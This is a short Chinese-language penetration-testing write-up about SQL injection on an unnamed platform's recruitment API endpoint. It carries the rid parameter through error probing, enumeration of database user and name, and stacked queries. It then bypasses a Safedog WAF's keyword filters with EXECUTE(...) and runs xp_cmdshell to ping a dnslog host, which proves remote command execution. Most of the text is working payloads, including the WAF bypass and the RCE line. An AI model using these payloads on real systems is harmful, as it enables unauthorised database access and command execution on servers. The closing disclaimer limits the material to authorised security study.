某平台存在绕waf的sql注入导致rce
某平台存在sql注入导致rce
发现修改为2603-1页面不变
id=2602 → 返回 A 内容
id=2602-1 → 返回和 2601 一样的内容

后续发现实际接口为
/API/Web/Recruit.ashx?action=info&rid=
这个rid就是id值
可通过 rid 参数注入 SQL 语句
接下来我测试
rid=2602'
发现为数据库层报错直接回显
后放入sqlmap跑发现存在waf直接被封ip
手注被拦截
存在安全狗waf
哈哈哈哈
最后发现直接
rid=2602+SYSTEM_USER → 回显
rid=2602+USER → 回显
rid=2602+DB_NAME() → 回显

而后发现还存在堆叠注入
rid=2602;select 1/0

发现报错第二条
但是由于存在waf会拦截很多显眼关键字
对 exec/declare/xp_cmdshell/... 明显有关键字拦截
后发现可以通过特定语法(如 EXECUTE(...))绕过部分拦截
测试发现不存在回显
就测试无回显采用dnslog证明rce
测试rid=2602;EXECUTE('master..xp_cmdshell ''ping -n 4 dnslog''')

成功执行命令
温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。
涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。
如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。
